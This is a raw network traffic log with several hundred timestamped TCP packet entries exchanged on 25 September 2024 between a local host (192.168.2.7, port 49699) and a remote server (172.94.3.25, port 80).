Sep 25, 2024 18:33:54.457012892 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457020998 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457030058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457053900 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457089901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457104921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457118988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457123995 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457135916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457149029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457163095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457163095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457178116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457186937 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457191944 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457206011 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457221031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457222939 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457235098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457246065 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457268953 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457326889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457341909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457355022 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457370043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457379103 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457385063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457398891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.457406044 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.457431078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458015919 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458030939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458045006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458060026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458074093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458084106 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458087921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458103895 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458105087 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458120108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458127975 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458162069 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458375931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458393097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458408117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458437920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458441019 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458456039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458471060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458484888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458489895 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458501101 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458509922 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458514929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458530903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458534002 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458553076 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458566904 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458574057 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458580971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458595991 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458600998 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458609104 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458626986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458641052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458648920 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458656073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458664894 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458671093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458686113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458693027 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458699942 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458714008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458717108 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458729029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458750010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.458753109 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.458791018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.459227085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.459244013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.459258080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.459273100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.459280968 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.459287882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.459304094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.459320068 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.459342003 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.635937929 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641235113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641269922 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641284943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641314030 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641369104 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641382933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641397953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641402006 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641412973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641433954 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641477108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641508102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641607046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641622066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641635895 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641649961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641659975 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641664028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641678095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641684055 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641691923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641707897 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641707897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.641747952 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.641896963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642087936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642102003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642116070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642117977 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642129898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642143965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642158985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642159939 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642173052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642187119 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642187119 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642199039 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642201900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642216921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642230034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642245054 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642256021 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642258883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642293930 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642680883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642694950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642709970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642724037 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642725945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642744064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642757893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642771959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642781019 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642788887 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642805099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.642807007 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.642821074 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643008947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643023014 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643059969 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643162966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643177986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643189907 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643208027 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643213987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643223047 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643227100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643240929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643254995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643256903 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643269062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643280983 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643282890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643297911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643311977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643317938 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643328905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643342972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643346071 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643357038 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643371105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643374920 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643394947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643404961 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643416882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643430948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643445015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.643448114 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.643491030 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644144058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644159079 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644181013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644196033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644201040 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644210100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644223928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644226074 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644237041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644251108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644252062 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644265890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644279957 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644294024 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644294977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644309044 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644323111 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644331932 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644337893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644347906 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644351006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644365072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644370079 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644380093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644393921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644398928 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644411087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644426107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644440889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644440889 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644454956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.644467115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.644493103 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645189047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645210981 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645226002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645241022 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645246029 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645256042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645271063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645276070 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645283937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645298958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645313978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645319939 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645328045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645342112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645350933 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645355940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645366907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645370960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645380974 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645385027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645399094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645414114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645431042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645431995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645447016 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645452976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645462036 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645474911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645479918 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.645489931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.645510912 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646136045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646159887 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646173954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646181107 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646198988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646207094 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646214008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646228075 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646241903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646256924 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646258116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646271944 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646276951 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646287918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646301985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646305084 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646317005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646332026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646346092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646349907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646361113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646372080 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646377087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646398067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646401882 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646418095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646434069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646439075 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646449089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646464109 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.646490097 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.646497011 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647085905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647111893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647125959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647140026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647144079 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647155046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647171021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647176981 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647185087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647201061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647205114 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647216082 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647231102 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647244930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647248983 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647258997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647265911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647274971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647289038 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647293091 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647304058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647319078 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647320986 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647335052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647350073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647352934 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647363901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647378922 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647381067 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647412062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647416115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647908926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647922993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647938013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.647948980 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.647978067 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648046970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648063898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648077965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648101091 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648103952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648118019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648132086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648138046 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648147106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648160934 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648174047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648181915 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648189068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648202896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648211002 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648219109 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648226023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648235083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648248911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648258924 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648262978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648277998 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648283958 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648293018 CEST	80	49699	172.94.3.25	192.168.2.7
